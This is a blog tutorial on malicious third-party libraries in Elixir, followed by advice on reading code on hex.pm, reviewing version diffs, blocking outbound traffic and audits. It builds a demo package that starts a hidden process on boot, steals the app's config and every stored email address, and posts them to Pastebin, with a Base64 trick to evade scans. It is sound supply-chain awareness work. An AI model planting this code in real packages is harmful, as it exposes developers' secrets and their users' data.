Welcome back, folks!
My girlfriend broke up with me
when she found out I only had 9 toes.
She was lack toes intolerant.
Alright. Today, we’ll take a look at security issues when using third-party libraries in your Elixir applications. If you add libraries to your application, you could get robbed of all your secrets and user data. I’ll show you what a malicious library could look like and how you can protect yourself against this. So hang on and let’s get cracking!
🔗 The Problem
We all use libraries to develop our software. Usually, the process of adding a library is simple. You google a problem, find a library that fixes it, and add it to your mix.exs file. You run mix deps.get, check if the library does what it promised, and push everything to production. Easy.
But when you add a library, you copy somebody else’s code into your application. So, how do you know that it’s not malicious? You might say "I don't. I trust it." and you wouldn’t be alone. I do this too, but we shouldn’t.
Malicious. libraries. are. not. uncommon.
The biggest problem is when attackers publish malicious libraries to a package manager like npm, RubyGems, or hex. They become immediately available to millions of developers and installing them only requires bumping a version number. With little effort, attackers can compromise a lot of targets.
There’s a myriad of ways a malicious library can get into a package manager, but these are the most common ones:
- The attacker publishes the library. This is the most obvious way, but it takes the most effort on the attacker’s side. People have to start using the library before the attacker can compromise them, so the library must offer some value that convinces users to add it. To generate traction, the attacker would most likely try to add the library as a dependency to an existing library with a pull request on GitHub. Still, there’s an easier method.
- The attacker takes over an existing library. This is the easiest and fastest way for an attacker to publish a malicious library. They can take over an existing library, add malicious code, and publish a new version. Existing users will bump the version number and start using the malicious version of the library, usually without noticing. The attacker can take over an existing library through legal ways, for example by taking over ownership of a library that needs a new maintainer. That’s why maintainer vetting is crucial for popular libraries.
  The attacker could also try to steal the GitHub credentials of an author of a popular library and publish a malicious version under their name. So, if you’re the author of a library, better protect your account as much as possible. You might not notice that your credentials are stolen until it’s too late.
  The most difficult version would be a supply-chain attack where an attacker penetrates the servers on which the library is compiled before it gets published. Before the compilation, the attacker can add malicious code. This is the nastiest attack because nobody would notice unless they compare the code on the package manager with the code on GitHub, which nobody does. Some libraries come as compiled binaries, so you couldn’t even compare raw code but would have to compile the library yourself and compare your binaries against the version on the package manager. Unless you automate this step, you’d never do it.
- The attacker takes over a retired/deleted library. Most package managers don’t allow this, but it might happen that an author deletes an existing library and the attacker publishes a new library with the same name and version right after. The new library would contain the same code as the old one plus some malicious nastiness. The worst thing is that victims wouldn’t even need to bump a version number. When they redeploy their server, they would re-fetch the same library with the same version but would now get a malicious version instead. This is why many package managers block the names of retired libraries.
So, I hope that you now understand that trusting your dependencies blindly is a bad thing.
To drive home my argument, I will show you exactly how we can build a malicious library with Elixir. Now, I’m not revealing any well-kept secrets here. Writing the library took me 2 hours and a few ChatGPT prompts, so anybody could do it. Let’s dive in.
🔗 The Library
The library is very simple. All it does is convert HEX color codes into RGB values. Here’s what the main module looks like:
defmodule Colors.Convert do
  def hex_to_rbg(hex) do
    hex = String.replace(hex, "#", "")
    <<r::binary-size(2), g::binary-size(2), b::binary-size(2)>> = hex
    {r, ""} = Integer.parse(r, 16)
    {g, ""} = Integer.parse(g, 16)
    {b, ""} = Integer.parse(b, 16)
    {r, g, b}
  end
end
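As a quick check of what the module above does, here is a small usage sketch. It repeats the module so that the snippet runs on its own, and the color #FF8800 is just an illustrative input.

```elixir
defmodule Colors.Convert do
  # Converts a hex color such as "#FF8800" into an {r, g, b} tuple of integers.
  def hex_to_rbg(hex) do
    hex = String.replace(hex, "#", "")
    # Split the six hex digits into three two-character chunks.
    <<r::binary-size(2), g::binary-size(2), b::binary-size(2)>> = hex
    {r, ""} = Integer.parse(r, 16)
    {g, ""} = Integer.parse(g, 16)
    {b, ""} = Integer.parse(b, 16)
    {r, g, b}
  end
end

IO.inspect(Colors.Convert.hex_to_rbg("#FF8800"))
# prints {255, 136, 0}
```

Nothing in this public API hints at what else the package might do once it is started.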
Now, the point of this exercise is to add nastiness to an otherwise harmless-looking library, so let’s do that.
🔗 Starting the Attack Process
For our maliciousness, we will take advantage of the fact that Elixir starts every dependency that defines an Application callback module, including its supervision tree. So, when the main app starts, the processes of all dependencies start as well. This is great for spinning up a GenServer that steals all your secrets, so let’s do it.
This is what the application of our library would look like:
defmodule Attack.Application do
  use Application

  @impl true
  def start(_type, _args) do
    children = [
      Attack.Worker
    ]

    opts = [strategy: :one_for_one, name: Attack.Supervisor]
    Supervisor.start_link(children, opts)
  end
end
You might notice that we renamed the Colors namespace to Attack here. This way, autocomplete will not expose our maliciousness. If a user wants to use our library, they will most likely type Colors. and hit Tab to see all possible functions. In that case, we don’t want that list to show our nasty functions as well, so we put all our malicious modules under the Attack namespace.
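From the defender's side, you don't have to rely on autocomplete to see what a dependency brings along. The following is a minimal sketch, assuming you run it inside your project (for example in iex -S mix). DepAudit is a made-up helper name. It lists every loaded application that defines a start callback, and every module an application ships, whatever namespace it hides under.

```elixir
defmodule DepAudit do
  # Returns {app, callback_module} for every loaded application that defines
  # an application callback, i.e. one that starts processes on boot.
  def apps_with_callback do
    for {app, _description, _version} <- Application.loaded_applications(),
        # Applications without a callback report [] here and are skipped.
        {mod, _args} <- [Application.spec(app, :mod)] do
      {app, mod}
    end
  end

  # Returns every module an application ships, regardless of its namespace.
  def modules(app), do: Application.spec(app, :modules) || []
end

IO.inspect(DepAudit.apps_with_callback(), label: "apps with a start callback")
IO.inspect(length(DepAudit.modules(:elixir)), label: "modules shipped by :elixir")
```

A color-conversion library that shows up in the first list, or that ships modules outside its own namespace, deserves a closer look.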
Next, let’s look at the module that will execute the attack:
defmodule Attack.Worker do
  use GenServer
  require Logger

  def start_link(init_args) do
    GenServer.start_link(__MODULE__, [init_args])
  end

  def init(_args) do
    schedule_attack()
    {:ok, :initial_state}
  end

  defp schedule_attack() do
    Process.send_after(self(), :attack, 60_000)
  end

  def handle_info(:attack, state) do
    # This is where we'll steal the secrets.
    {:noreply, state}
  end
end
The module is simple: It defines a GenServer that starts up and schedules a message called :attack for 60 seconds in the future. The reason why we delay the attack is that we want to wait until the entire application - including Ecto Repos - is started. This way, we know that the application started successfully and the configuration is correct.
🔗 Stealing your Application Config
The first thing that we’ll do is steal the entire application configuration, including all loaded environment variables. This is how:
def handle_info(:attack, state) do
  repos = apply(Ecto.Repo, :all_running, [])
  Enum.each(repos, &steal_config/1)
  {:noreply, state}
end

defp steal_config(repo) do
  app = Application.get_application(repo)
  config = Application.get_all_env(app)
  # This is where we'll post the config to Pastebin later.
end
We want to read out the config for the running application. There’s no way (that I know of) to find out the “parent” application that uses a library, so we have to create a workaround. First, we fetch all running Ecto.Repos. But we don’t want our library to depend on Ecto. The user might get suspicious why our color-converting library needs Ecto. But if we call Ecto.Repo.all_running() here, the compiler will throw a warning that Ecto.Repo is undefined. So, we use the apply/3 function instead. This way, we can still call Ecto.Repo.all_running() at runtime, but the compiler won’t complain.
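To make the apply/3 trick concrete, here is a small, harmless sketch of a dynamic call. DynamicCall and NotLoaded.Module are made-up names. The point is only that the compiler does not check a module passed to apply/3, which is also why such calls are worth searching for when you review a dependency that doesn't list the module's library in its deps.

```elixir
defmodule DynamicCall do
  # Calls mod.fun(args...) only if the module and function exist at runtime.
  # Because the call goes through apply/3, the compiler never checks it.
  def maybe_call(mod, fun, args) do
    if Code.ensure_loaded?(mod) and function_exported?(mod, fun, length(args)) do
      {:ok, apply(mod, fun, args)}
    else
      :unavailable
    end
  end
end

IO.inspect(DynamicCall.maybe_call(String, :upcase, ["abc"]))
# prints {:ok, "ABC"}
IO.inspect(DynamicCall.maybe_call(NotLoaded.Module, :foo, []))
# prints :unavailable
```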
Next, we iterate through all running repos and get the application that is running them. This way, we can read the application’s config using Application.get_all_env(app). Now, we have all configurations of the running app. This will include everything from database credentials to the secret key base of a Phoenix application to potentially secret API keys for interacting with external services. Great!
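If you want to convince yourself how open the application environment is, the following sketch may help. The app name :my_demo_app and its keys are made up for illustration. It shows that any code running in the same VM can read another application's entire environment.

```elixir
# Pretend this is the host application's configuration
# (:my_demo_app and both keys are hypothetical).
Application.put_env(:my_demo_app, :secret_key_base, "s3cr3t")
Application.put_env(:my_demo_app, :stripe_api_key, "sk_test_123")

# Any module in the same VM, including one from a dependency,
# can read the whole environment of another application.
config = Application.get_all_env(:my_demo_app)

IO.inspect(config |> Keyword.keys() |> Enum.sort())
# prints [:secret_key_base, :stripe_api_key]
```

There is no per-library permission model here: whatever your app can read, its dependencies can read too.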
🔗 Posting the Secrets to Pastebin
Now, stealing the application config doesn’t help us if we can’t get it off the server and onto a platform where we can read it. Let’s use Pastebin for that. Pastebin lets you create text files with a simple API call. Now, we could also send the configuration back to a server under our control. This is called a Command and Control (CnC) server. For this purpose though, Pastebin will suffice.
For posting the config to Pastebin, we don’t want to depend on a third-party library that might give us away. Therefore, we will use Erlang’s built-in :httpc client. It allows us to make HTTP requests to Pastebin. Here’s how:
defp send_secret(secret) do
  :inets.start()
  url = "https://pastebin.com/api/api_post.php"

  payload =
    "api_dev_key=MY_DEV_KEY&api_option=paste&api_paste_private=2&api_user_key=MY_USER_KEY&api_paste_code=#{inspect(secret)}"

  :httpc.request(:post, {url, [], ~c"application/x-www-form-urlencoded", payload}, [], [])
end
As you can see, :httpc is pretty low-level, but trust me when I say that the code above makes a POST request to Pastebin with some form data. The parameters that we send here are:
- api_dev_key: The access key to Pastebin’s API. I generated this by signing up to Pastebin with a masked email.
- api_option: Tells Pastebin that we want to paste the content into a new file.
- api_paste_private: Tells Pastebin to make the new file private so that only we can read it. We don’t want other people to see the configuration on Pastebin.
- api_user_key: Tells Pastebin which user the file should be connected to (my profile). If we don’t provide this parameter, we can’t make the file private.
- api_paste_code: The stolen configuration. We can send any text here.
You can find the full code on GitHub.
And that’s it! Now, we will steal the application’s configuration and post it on Pastebin from where we can then retrieve it for further malicious activities. Here’s a screenshot of what the file looks like on Pastebin:
🔗 Stealing your User Data
Now that we can steal any secrets and post them to Pastebin, let’s go one step further and steal all user data stored in the database. Our library can execute raw SQL, so let’s leverage that. First, we want to find all tables that contain a field called email or emails. Then, we’ll extract all emails stored in these tables and send them off to Pastebin. Here’s the code for that:
def handle_info(:attack, state) do
  repos = apply(Ecto.Repo, :all_running, [])
  Enum.each(repos, &steal_config/1)
  Enum.each(repos, &steal_emails/1)
  {:noreply, state}
end

defp steal_emails(repo) do
  tables = get_tables_with_emails(repo)
  Enum.each(tables, fn table -> do_steal_emails(repo, table) end)
end

defp get_tables_with_emails(repo) do
  query = """
  SELECT table_name
  FROM information_schema.columns
  WHERE column_name in ('email', 'emails');
  """

  {:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query])
  List.flatten(result.rows)
end

defp do_steal_emails(repo, table) do
  query = "SELECT email FROM #{table}"
  {:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query])
  emails = List.flatten(result.rows)
  send_secret(emails)
end
Let’s walk through the code above. First, we go through every repo and execute a SQL query that returns all tables that contain the column email or emails. If you generated your authentication system with mix phx.gen.auth, your users table will have this column.
Next, for all tables that contain an email column, we retrieve all user emails, which are usually stored in plaintext. We then send off the list of emails through :httpc to Pastebin using the send_secret/1 function.
And that’s it! We have now stolen the application configuration and the email address of all users. Nice!
I will stop here, but I hope you get the idea. Any library that you pull into your application can access pretty much everything. You should be very careful with the libraries that you use.
I didn’t dive into all possible ways that a third-party library could compromise your application. Be aware that a library has access to everything, even your file system. So, it could also remove all your files and folders and wipe your entire server if it wanted to.
Now, your first instinct might be: "I'll just read all code from all libraries on GitHub before using them!" Sadly, I have bad news for you. The code that you download from Hex.pm might not be the code that you see on GitHub. So, if you read the code, make sure to do it on Hex.pm. As far as I know, Hex does not check whether these are the same. You could create a checksum of the code on GitHub and compare it with the checksum that Hex gives you, but that might be tedious.
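If you want to automate such a comparison locally, one possible approach is to hash the files of the unpacked package and of a Git checkout and list the ones that differ. This is only a rough sketch under assumptions. TreeDigest is a made-up helper, both directories are expected to exist on disk already, and it compares file contents rather than the checksum that Hex itself publishes. Hex packages usually contain only a subset of the repository plus some metadata files, so expect a few harmless differences.

```elixir
defmodule TreeDigest do
  # Returns a map of relative path => SHA-256 hex digest
  # for every regular file below dir.
  def digests(dir) do
    dir
    |> Path.join("**/*")
    |> Path.wildcard(match_dot: true)
    |> Enum.filter(&File.regular?/1)
    |> Map.new(fn path ->
      {Path.relative_to(path, dir), sha256(File.read!(path))}
    end)
  end

  # Lists the files in package_dir whose content differs from,
  # or that are missing in, reference_dir.
  def differences(package_dir, reference_dir) do
    reference = digests(reference_dir)

    for {path, digest} <- digests(package_dir),
        Map.get(reference, path) != digest,
        do: path
  end

  defp sha256(data) do
    :crypto.hash(:sha256, data) |> Base.encode16(case: :lower)
  end
end

# Hypothetical usage: compare the fetched package with a Git checkout.
# TreeDigest.differences("deps/colors", "tmp/colors_git_checkout")
```

Every path this returns is a file you should read on the package side before trusting it.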
🔗 How to protect yourself
You might think now: "That's terrible! How can I protect myself?" and unfortunately, there’s no easy answer. However, I reached out to the Hex Core Team and got some useful tips from the incredibly helpful Wojtek Mach.
I also asked Michael Lubas for suggestions. Michael is the founder of Paraxial.io, a cybersecurity firm focused on Elixir applications. Here is what they had to say.
According to Wojtek, the Hex package manager conducts no security scanning of its packages and would not have flagged the attacks above. Security scans like checking for HTTP calls to Pastebin are pointless because attackers can circumvent the scans easily by obfuscating the code. For example, we can obfuscate the :httpc-call above by Base64 encoding both the :httpc atom and the URL:
apply("aHR0cGM=" |> Base.decode64!() |> String.to_atom(), :request, [Base.decode64!("aHR0cHM6Ly9wYXN0ZWJpbi5jb20=")])
# This is equal to:
apply(:httpc, :request, ["https://pastebin.com"])
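To see why a simple scan misses this, consider the following toy sketch. NaiveScanner and its list of suspicious strings are made up for illustration and are not how any real scanner works. It flags the plain call but lets the Base64 version through, even though both do the same thing at runtime.

```elixir
defmodule NaiveScanner do
  # Hypothetical deny list of strings a simple scanner might look for.
  @suspicious [":httpc", "pastebin.com"]

  # Returns true if the source text contains any suspicious string.
  def flagged?(source) do
    Enum.any?(@suspicious, &String.contains?(source, &1))
  end
end

plain = ~S"""
apply(:httpc, :request, ["https://pastebin.com"])
"""

obfuscated = ~S"""
apply("aHR0cGM=" |> Base.decode64!() |> String.to_atom(), :request, [Base.decode64!("aHR0cHM6Ly9wYXN0ZWJpbi5jb20=")])
"""

IO.inspect(NaiveScanner.flagged?(plain))      # prints true
IO.inspect(NaiveScanner.flagged?(obfuscated)) # prints false

# Both variants resolve to the same module at runtime.
IO.inspect("aHR0cGM=" |> Base.decode64!() |> String.to_atom()) # prints :httpc
```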
Hex does reserve library names forever though. Even if you retire a package, nobody can take over the library name. So, that at least is one less headache.
Now, here is what you can do to reduce the risk of adding malicious libraries to your project.
🔗 Read the Code
First, before you add a library, go through its code on Hex.pm, not on GitHub. Hex doesn’t check whether the code of a package is equal to its GitHub repository. So, a library might have different code on GitHub than on Hex.pm. To read the library code on Hex, click on the little <> sign next to its latest version. After reading through a library’s code, you unfortunately also have to read through the code of its dependencies. Hex shows you a list of all dependencies next to the package versions.
The last step before adding the library is checking the publisher. Hex shows you the profile of who published a library in the package overview. You should check that the person that maintains the code on e.g. GitHub also publishes the package. If not, check the publisher thoroughly and make sure that it’s not an attacker that took somebody’s code and published another library with a similar name to the original library.
Here is where you can find these options on hex.pm:
🔗 Check library updates
After you add a library, you should re-read the code for every new version before updating. Luckily, Hex offers a convenient way to see the changes between the old and the new version. You can go to diff.hex.pm, enter the library name, and select the previous version and the version you want to update to. You can also open the diff view on the package page by clicking on the little page icon next to a version number. See the screenshot above.
Lastly, you can list your dependencies and their latest version using mix hex.outdated. This will generate a list of all packages, their version in your application, their latest version, and whether you can update to them automatically. At the end of the output, hex provides a link to diff.hex.pm that lists all packages to which you can update automatically.
Dependency         Current  Latest  Status
httpoison          1.8.2    2.1.0   Update not possible
phoenix            1.7.6    1.7.7   Update possible
phoenix_live_view  0.19.3   0.19.5  Update possible
phoenix_view       2.0.2    2.0.2   Up-to-date
postgrex           0.17.1   0.17.2  Update possible

Run `mix hex.outdated APP` to see requirements for a specific dependency.

To view the diffs in each available update, visit:
https://hex.pm/l/QKnyu
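Whether an update is "possible" depends on the version requirements in your mix.exs. The sketch below uses made-up requirements for two of the packages above (your own mix.exs will differ) and checks them with Version.match?/2. The real task also takes the requirements of your other dependencies into account, so treat this as a simplification.

```elixir
# Hypothetical requirements, as they might appear in the deps list of mix.exs.
requirements = [httpoison: "~> 1.8", phoenix: "~> 1.7.6"]

# Latest versions taken from the output above.
latest = [httpoison: "2.1.0", phoenix: "1.7.7"]

for {dep, requirement} <- requirements do
  status =
    if Version.match?(latest[dep], requirement),
      do: "Update possible",
      else: "Update not possible"

  IO.puts("#{dep}: #{status}")
end

# prints:
# httpoison: Update not possible
# phoenix: Update possible
```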
If you click the link at the end of the output, you will open a website that looks like this:
🔗 Block outbound Traffic
A typical failsafe for preventing malicious libraries from “phoning home” is to block outbound traffic from the servers by default. In our case, the malicious library sends our secrets to Pastebin via an HTTP call. If we block outgoing requests, we still have a malicious library in our application, but at least we prevented the extraction of our secrets.
Sadly, not every hosting provider offers such functionality out of the box. Usually, you have to install software like Stripe’s Smokescreen that adds a layer of protection to your servers. Here’s how to add Smokescreen to Fly.io. After adding this, you can configure which external URLs you allow and Smokescreen will block everything else. It’s not easy to set up and maintain, but it will be worth it if you get attacked.
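The idea behind such an allowlist is "deny by default". The following sketch only illustrates that decision logic. EgressPolicy and its host list are made up, and this is not how Smokescreen is configured. Keep in mind that the check has to be enforced at the network or proxy layer, because a malicious library would simply not call a function like this.

```elixir
defmodule EgressPolicy do
  # Hypothetical allowlist; a real one would list the external
  # services your application actually needs.
  @allowed_hosts ["api.stripe.com", "hooks.slack.com"]

  # Returns true only for URLs whose host is explicitly allowed.
  # Everything else, including unparsable URLs, is denied.
  def allowed?(url) do
    case URI.parse(url) do
      %URI{host: host} when is_binary(host) ->
        String.downcase(host) in @allowed_hosts

      _ ->
        false
    end
  end
end

IO.inspect(EgressPolicy.allowed?("https://api.stripe.com/v1/charges"))
# prints true
IO.inspect(EgressPolicy.allowed?("https://pastebin.com/api/api_post.php"))
# prints false
```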
🔗 Audit your System
Ideally, you read all code of every library and of all their dependencies, but let’s be honest: Unless you’re extremely security-focused, you probably won’t do that. Luckily, there are security experts like Michael out there who do it for you (for a price obviously). Just make sure that you add your third-party libraries to the scope of a security audit when you enlist a pentester.
I leave one honorable mention for mix hex.audit which warns you if you depend on a retired hex package. Most of the time, this won’t do anything, but without it, you might not notice you rely on a retired library that won’t receive future maintenance and security updates. So, better put mix hex.audit in your build pipeline and forget about it.
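One way to wire this into a pipeline is a Mix alias that runs the audit before your tests. This is a sketch of a mix.exs under assumptions. The project name, the alias name ci, and the empty deps list are placeholders. As far as I know, mix hex.audit sets a non-zero exit code when it finds retired packages, which most CI systems treat as a failed build.

```elixir
defmodule MyApp.MixProject do
  use Mix.Project

  def project do
    [
      app: :my_app,
      version: "0.1.0",
      deps: [],
      aliases: aliases()
    ]
  end

  # `mix ci` first checks for retired Hex packages, then runs the tests.
  # The alias name is arbitrary.
  defp aliases do
    [ci: ["hex.audit", "test"]]
  end
end
```

Your CI job then only needs to call mix ci instead of mix test.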
🔗 Last Words
I hope this post didn’t make you panic and call for an emergency staff meeting. Yes, very bad things can happen and you should keep that in mind. But you can mitigate the risk. Just be careful when you add a library. Avoid it when you can. And if you have to, make sure it comes from a reputable source and skim through its code. Block all outbound traffic if you can.
🔗 Conclusion
And that’s it! I hope you enjoyed this article! If you want to support me, you can buy my book or video course. Follow me on Twitter or subscribe to my newsletter below if you want to get notified when I publish the next blog post. Until the next time! Cheerio 👋